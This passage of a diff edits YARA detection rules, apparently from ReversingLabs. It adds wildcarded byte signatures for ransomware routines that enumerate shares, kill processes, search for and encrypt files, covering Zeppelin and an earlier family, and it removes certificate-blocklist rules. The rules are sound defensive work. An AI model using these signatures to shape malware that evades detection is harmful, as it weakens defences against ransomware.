+            ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 07 C7 45 ?? ?? ?? ?? ?? EB 43 83 7D ?? ?? 74 36 83 7D ??
+            ?? 74 30 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
+            74 07 C7 45 ?? ?? ?? ?? ?? EB 07 C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? EB 07 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 8B 45 ?? 8B E5 5D C3
+        }
+		$v30_2_encrypt_file_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 56 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 BF 05 00 00 8B 45 ??
+            83 38 ?? 74 1B 8B 4D ?? 83 79 ?? ?? 74 12 8B 55 ?? 83 7A ?? ?? 74 09 8B 45 ?? 83 78 ?? ?? 75 08 8B 45 ?? E9 94 05 00 00
+            8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 89 45 ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ??
+            ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 1A 05 00 00 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B
+            4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 74 07 C7 45 ?? ?? ?? ?? ?? 66 0F 57 C0 66 0F 13 45 ?? 8D 45 ?? 50
+            8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 0D 04 00 00 66 0F 57 C0 66 0F 13 85 ?? ?? ?? ?? 6A ?? 6A ??
+            8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 F8 ?? 0F 84 D5 03 00 00
+            8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 BD 03 00 00 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B
+            45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 90 03 00 00 C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 52 03 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 FF 02 00 00
+        }
+		$v30_2_encrypt_file_2 = {
+            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 8B 48 ?? 51 8B 55 ??
+            8B 02 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 A7 02 00 00 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 8B 42 ?? 50 8B
+            4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 84 67 02 00 00 8B 55 ?? 8B 45 ?? 3B 42 ??
+            0F 85 58 02 00 00 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 0F
+            84 31 02 00 00 8B 45 ?? 3B 45 ?? 0F 85 25 02 00 00 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 C7 45 ?? ?? ?? ??
+            ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 F4 01 00 00 66 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ??
+            ?? ?? 66 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 3B 4D ?? 75 0C 8B 55 ?? 3B 55 ?? 0F
+            84 90 01 00 00 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 33 C9 8B 55 ?? 2B 55 ?? 8B 75 ?? 1B 75 ?? 89 85 ?? ?? ?? ?? 89 8D ?? ?? ??
+            ?? 89 95 ?? ?? ?? ?? 89 75 ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 77 1D 72 0E 8B 8D ?? ?? ?? ?? 3B 8D ?? ?? ?? ?? 73 0D 8B 55 ??
+            33 C0 89 55 ?? 89 45 ?? EB 12 8B 4D ?? 2B 4D ?? 8B 55 ?? 1B 55 ?? 89 4D ?? 89 55 ?? 8B 45 ?? 89 45 ?? 8B 4D ?? 33 D2 03
+            4D ?? 13 55 ?? 89 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 75 12 8B 8D ?? ?? ?? ?? 3B 4D ?? 75 07 C7
+            45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 85 C0 0F
+            84 B3 00 00 00 8B 4D ?? 3B 4D ?? 0F 85 A7 00 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B
+        }
+		$v30_2_encrypt_file_3 = {
+            4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 71 6A ?? 8D 45 ?? 50 8B 4D ??
+            51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 74 42 8B 55 ?? 3B 55 ?? 75 3A 8B 45 ?? 33 C9 03
+            45 ?? 13 4D ?? 89 45 ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 33 C0 03 55 ?? 13 45 ?? 89 55 ?? 89 45 ?? 8B 4D ?? 51 E8
+            ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 75 02 EB 0D 83 7D ?? ?? 74 02 EB 05
+            E9 5C FE FF FF 83 7D ?? ?? 74 17 8B 4D ?? 3B 4D ?? 75 0F 8B 55 ?? 3B 55 ?? 75 07 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B
+            88 ?? ?? ?? ?? FF D1 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ??
+            ?? FF D2 83 7D ?? ?? 74 0C 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 83 7D
+            ?? ?? 75 22 6A ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 75 07 C7 45 ?? ?? ?? ?? ?? 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 74 60 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ??
+            ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 74 37 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ??
+            ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ??
+            ?? ?? FF D1 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 8B 45 ?? 5E 8B E5 5D C3
+        }
+		$v30_3_encrypt_file_1 = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 75 08 8B 45 ?? E9 48 04 00 00 83 7D ?? ?? 75 08 8B 45 ?? E9 3A 04 00
+            00 8B 45 ?? 83 78 ?? ?? 74 11 8B 4D ?? 83 39 ?? 74 09 8B 55 ?? 83 7A ?? ?? 75 08 8B 45 ?? E9 18 04 00 00 C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 6A ?? 8B 55
+            ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B
+            90 ?? ?? ?? ?? FF D2 89 45 ?? 83 7D ?? ?? 0F 84 90 03 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84
+            83 00 00 00 8B 45 ?? 8B 48 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 74 6B 6A ?? 8D 55 ?? 52 8B 45 ?? 8B 48 ??
+            51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 74 39 8B 55 ?? 3B 15 ?? ?? ?? ?? 75 2E 8B 45 ??
+            8B 48 ?? 51 8B 55 ?? 8B 42 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 50 ?? FF D2 85 C0 75 0E C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 84 9A 02 00 00 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ??
+            8B 90 ?? ?? ?? ?? FF D2 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 63 02 00 00
+            8B 55 ?? 3B 55 ?? 0F 87 57 02 00 00 8D 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 3F 02 00 00 6A ?? 6A
+        }
+		$v30_3_encrypt_file_2 = {
+            6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 0B 02 00
+            00 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 81 E1 ?? ?? ?? ?? 74 1C 6A ?? 6A ?? 8B 15 ?? ?? ?? ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B
+            88 ?? ?? ?? ?? FF D1 C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ??
+            FF D0 85 C0 0F 84 52 01 00 00 C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 6A ?? 8B 55 ?? 8B 02 50 8B 4D ?? 8B 51 ?? 52 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 84 0A 01 00 00 8B 55 ?? 8B 42 ?? 83 E8 ?? 89 45 ?? 8B 4D ?? D1 E1
+            89 4D ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 CC 00 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 74 76 8B 55 ??
+            3B 55 ?? 73 07 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 5F 8B 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 6A ?? 8B 45 ?? 50 6A ?? 8B 4D
+            ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 74 21 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ??
+            ?? ?? 8B 88 ?? ?? ?? ?? FF D1 EB 15 83 7D ?? ?? 74 0D 83 7D ?? ?? 74 07 C7 45 ?? ?? ?? ?? ?? EB 0E EB 02 EB 0A 83 7D ??
+            ?? 0F 84 54 FF FF FF 83 7D ?? ?? 74 07 C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ??
+        }
+		$v30_3_encrypt_file_3 = {
+            ?? 8B 88 ?? ?? ?? ?? FF D1 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 7D ?? ?? 75 47 8B 4D ?? 81 E1 ??
+            ?? ?? ?? 74 3C 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 6A ?? 8D 4D ?? 51 8B 55 ?? 8B 42 ??
+            50 8B 4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ??
+            FF D0 EB 07 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 83 7D ?? ?? 75 20 68 ?? ?? ?? ?? 8B
+            45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 07 C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB 07 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0
+            8B 45 ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Reiner Wodey Informationssysteme" and pe.signatures [ i ] . serial == "77:e0:11:7e:8b:2b:8f:aa:84:be:d9:61:01:9d:5e:f8" and 1383695999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( ( $v30_entrypoint at pe.entry_point ) and $v30_api_load and $v30_calculate_hash and $v30_dll_load and $v30_1_find_file_1 and $v30_1_find_file_2 and $v30_1_encrypt_file_1 and $v30_1_encrypt_file_2 and $v30_1_encrypt_file_3 ) or ( ( $v30_entrypoint at pe.entry_point ) and $v30_api_load and $v30_calculate_hash and $v30_dll_load and $v30_2_find_file_1 and $v30_2_find_file_2 and $v30_2_encrypt_file_1 and $v30_2_encrypt_file_2 and $v30_2_encrypt_file_3 ) or ( ( $v20_entrypoint at pe.entry_point ) and $v30_api_load and $v30_calculate_hash and $v30_dll_load and $v30_2_find_file_1 and $v30_2_find_file_2 and $v20_1_encrypt_file_1 and $v20_1_encrypt_file_2 and $v20_1_encrypt_file_3 ) or ( ( $v30_entrypoint at pe.entry_point ) and $v30_api_load and $v30_calculate_hash and $v30_dll_load and $v30_3_find_file_1 and $v30_3_find_file_2 and $v30_3_encrypt_file_1 and $v30_3_encrypt_file_2 and $v30_3_encrypt_file_3 ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4F3Feb4Baf377Aea90A463C5Dee63884 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Zeppelin : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Zeppelin ransomware."
 		author = "ReversingLabs"
-		id = "8de9bcf3-d705-590f-8898-52218f937571"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "f5cf514d-4dd0-58b7-82d0-5cb516a139a3"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2934-L2950"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "56c37e758db33aa40e9a2c1c5a4eb14c2c370f614e838d86bf20c64f79e2a746"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Zeppelin.yara#L1-L109"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8fb07e49d2ff9d497fb36a5d901748315ae519f5ef845d1a5ec6341d0eb1f68c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Zeppelin"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$search_files_p1 = {
+            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
+            89 20 8D 45 ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8B 45 ?? E8 ??
+            ?? ?? ?? 8B D8 8B 45 ?? E8 ?? ?? ?? ?? 2B D8 43 53 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 42
+            8B 45 ?? 59 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? FF 30 FF 75 ?? 68 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? 83 F8
+            ?? 7C ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84
+            ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            C3
+        }
+		$search_files_p2 = {
+            8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ??
+            ?? 64 FF 30 64 89 20 F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 45 ?? 50
+            8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 8D
+            ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ??
+            33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ??
+            ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5B 8B E5 5D C3
+        }
+		$kill_processes = {
+            55 8B EC 33 C9 51 51 51 51 51 51 51 51 53 56 57 84 D2 74 ?? 83 C4 ?? E8 ?? ?? ?? ??
+            88 55 ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 D2 55 68 ?? ?? ?? ??
+            64 FF 32 64 89 22 8D 55 ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B D8 8B 45 ?? 89 58 ?? 8B C3 B2 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ??
+            C6 40 ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 83 E8 ?? 8B 00 8B F0 85 F6
+            7E ?? BB ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? 0F B6 54 1A ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 8D
+            55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 58 E8 ?? ?? ?? ?? 75 ?? 8D 55 ?? 8B 45
+            ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 40 ?? 8B 08 FF 51 ?? 8D 45 ?? E8 ?? ?? ?? ??
+            EB ?? 8D 45 ?? 8B 55 ?? 0F B6 54 1A ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ??
+            ?? 43 4E 75 ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? B1 ?? 33
+            D2 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ??
+            8B 45 ?? 80 7D ?? ?? 74 ?? E8 ?? ?? ?? ?? 64 8F 05 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 5F
+            5E 5B 8B E5 5D C3
+        }
+		$enum_shares = {
+            55 8B EC B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 ?? 51 53 56 57 89 45 ?? 8B 45 ?? E8 ?? ??
+            ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
+            89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 4D ?? 33
+            D2 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 89 45 ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B
+            45 ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 55 ?? B8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 FF 52 ?? 48 85
+            C0 0F 8C ?? ?? ?? ?? 40 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 8B 55 ?? 8B 45 ?? 8B
+            18 FF 53 ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 33 C0 55 68 ?? ?? ?? ?? 64
+            FF 30 64 89 20 FF 75 ?? 68 ?? ?? ?? ?? 8D 4D ?? 33 D2 8B 45 ?? E8 ?? ?? ?? ?? 8B 45
+            ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ??
+            8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89
+            10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 75 ?? FF 45 ??
+            FF 4D ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A
+            59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ??
+            ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB
+            ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$encrypt_files = {
+            55 8B EC 83 C4 ?? 53 56 33 DB 89 5D ?? 84 D2 74 ?? 83 C4 ?? E8 ?? ?? ?? ?? 8B D9 88
+            55 ?? 8B F0 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 D2 8B C6 E8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 88 5E ?? 88 5E ?? 56 6A ?? 8D 46 ?? 50 B9 ?? ?? ?? ?? 33 D2 33 C0 E8 ??
+            ?? ?? ?? 8B D8 89 5E ?? 85 DB 75 ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? 8B 45 ??
+            89 45 ?? C6 45 ?? ?? 8D 45 ?? 50 6A ?? 8B 0D ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ??
+            ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "F3D LIMITED" and pe.signatures [ i ] . serial == "4f:3f:eb:4b:af:37:7a:ea:90:a4:63:c5:de:e6:38:84" and 1526601599 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $kill_processes ) and ( $enum_shares ) and ( all of ( $search_files_p* ) ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_3D2580E89526F7852B570654Efd9A8Bf : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Darkside : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing LockerGoga ransomware."
+		description = "Yara rule that detects DarkSide ransomware."
 		author = "ReversingLabs"
-		id = "0514759c-2d10-5b29-aa2f-d16eb45b2816"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "061b00cb-9b70-521f-ab3f-7e6b3c129194"
+		date = "2021-05-17"
+		modified = "2021-05-17"
